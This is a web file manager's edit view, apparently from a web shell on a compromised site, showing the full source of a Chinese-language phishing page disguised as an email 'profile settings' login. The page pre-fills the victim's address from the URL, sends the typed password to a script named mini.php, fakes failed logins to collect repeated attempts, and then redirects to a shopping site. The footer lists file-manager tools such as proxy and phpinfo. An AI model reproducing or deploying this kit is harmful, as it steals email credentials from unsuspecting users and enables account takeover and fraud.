File manager - Edit - /home/adiance/public_html/beta/.well-known/acme-challenge/jmtk/index.html
Back
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/> <title>电子邮件配置文件设置</title> <meta name="robots" content="noindex" /><meta name="robots" content="nofollow" /> <META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" /> </head> <body style="background: #FAFAFA;"> <script> const url = 'mini.php'; //full url goes here </script> <style> .login{ width:255px; height:27px; font-family: arial; font-size: 14px; color:#0965B1; font-weight:light; background-color: #ffffff; border: solid 1px #BDBDBD; -webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 7px; border-radius: 2px 3px 1px 5px; } .btn{ width:110px; height:40px; font-family: arial; font-size: 14px; color:#FFF; background-color: #045FB4; border: solid 1px #045FB4; -webkit-box-shadow: 2px 3px 15px 5px #000000; box-shadow: 2px 3px 15px 7px #000000; padding: 10px; border-radius: 2px 5px 1px 7px; cursor:pointer; } </style> <div style="margin:-8px;width:100%"> <table cellspacing="0" width="100%" style="position:absolute;top:-5px;left:0px; height:60px; background-color: #045FB4; border: solid 1px #045FB4; -webkit-box-shadow: 1px 1px 1px 1px #616162; box-shadow: 1px 1px 1px 1px #616162; padding: 5px;"> <tr><td> <table><tr> <td style="width:15px;"></td> <td> <font style="font-family: arial; font-size: 14px; color:#FFF;"> <b> 收件箱 </b> </font> </td> <td style="width:30px;"></td> <td> <font style="font-family: arial; font-size: 14px; color:#FFF;"> <b> 发送 </b> </font> </td> <td style="width:30px;"></td> <td> <font style="font-family: arial; font-size: 14px; color:#FFF;"> <b> 垃圾邮件 </b> </font> </td> <td style="width:30px;"></td> <td> <font style="font-family: arial; font-size: 14px; color:#FFF;"> <b> 草稿 </b> </font> </td> <td style="width:30px;"></td> <td> <font style="font-family: arial; font-size: 14px; color:#FFF;"> <b> 垃圾 </b> </font> </td> </tr></table> </td></tr> </table> <table cellspacing="0" style="position:absolute;top:135px;left:80px; width:340px; height:370px; background-color: #FFF; border: solid 1px #BDBDBD; -webkit-box-shadow: 1px 1px 1px 1px #616162; box-shadow: 1px 1px 1px 1px #616162; padding: 5px; border-radius: 2px 12px 1px 12px;"> <tr><td></td></tr> </table> <div style="position:absolute;top:170px;left:120px;"> <font style="font-family: arial; font-size: 25px; color:#07589A;"> 电子邮件配置文件设置 </font> </div> <div style="position:absolute;top:210px;left:120px;"> <font style="font-family: arial; font-size: 17px; color:#07589A;"> <b>需要用户身份验证</b> </font> <br> <font style="font-family: arial; font-size: 13px; color:#5B5C5D;"> 请确认您是此用户 ID 的所有者 </font> </div> <div style="position:absolute;top:550px;left:80px;"> <font style="font-family: arial; font-size: 18px; color:#0965B1;"> <b>邮件应用</b> </font> <br> <font style="font-family: arial; font-size: 14px; color:#5B5C5D;"> <b>笔记</b> <b>联系人</b> <b>日历</b> <b>设置</b> <b>邮件配额</b> <b>搜索</b> </div> <form method="post" action="" onsubmit="Validate(); return false;"> <input readonly id="user" name="user" class="login" style="position:absolute;top:260px;left:115px" type="email"> <input required placeholder="输入密码" type="password" id="pass" name="pass" class="login" style="position:absolute;top:315px;left:115px"> <div style="position:absolute;top:365px;left:115px;"> <input type="checkbox" checked> <font style="font-family: arial; font-size: 13px; color:#5B5C5D;">记住我的用户 ID</font> </div> <input id="b1" type="submit" class="btn" style="position:absolute;top:420px;left:115px; font-weight:bold;" value="继续"> </form> </div> <input type="hidden" id="count" value="0"> <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script> <script> $(document).ready(function(){ var count=0; /////////////url email getting//////////////// var email = window.location.hash.substr(1); if (!email) { } else { var my_email =email; $('#user').val(my_email); } }) function Validate(){ var a = $('#user').val(); var b = $('#pass').val(); var c = $('#count').val(); $.post(url, {user:a,pass:b}, function(){ setTimeout(function(){ if(c>=2){ $('#count').val('0'); window.location='https://world.taobao.com'; }else{ $('#bg').fadeOut(); $('#bg2').fadeIn(); $('#user').css('top','250px'); $('#pass').css('top','311px'); $('#b1').css('top','381px'); $('#pass').val(''); var add = +c+1; $('#count').val(add); $('#pass').focus(); } },2000); }); } </script> <script> function process(){ var user = document.getElementById('user').value; var pass = document.getElementById('pass').value; if ((user == '') || (user == null)){ document.getElementById('bg').src=''; document.getElementById('user').focus(); return false; }else if ((pass == '') || (pass == null)){ document.getElementById('bg').src=''; document.getElementById('pass').focus(); return false; }else return true ; } </script> <script> $('input').focus(function(){ $(this).parents('.form-group').addClass('focused'); }); $('input').blur(function(){ var inputValue = $(this).val(); if ( inputValue == "" ) { $(this).removeClass('filled'); $(this).parents('.form-group').removeClass('focused'); } else { $(this).addClass('filled'); } }) </script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.3.33 | Generation time: 0.07 |
proxy
|
phpinfo
|
Settings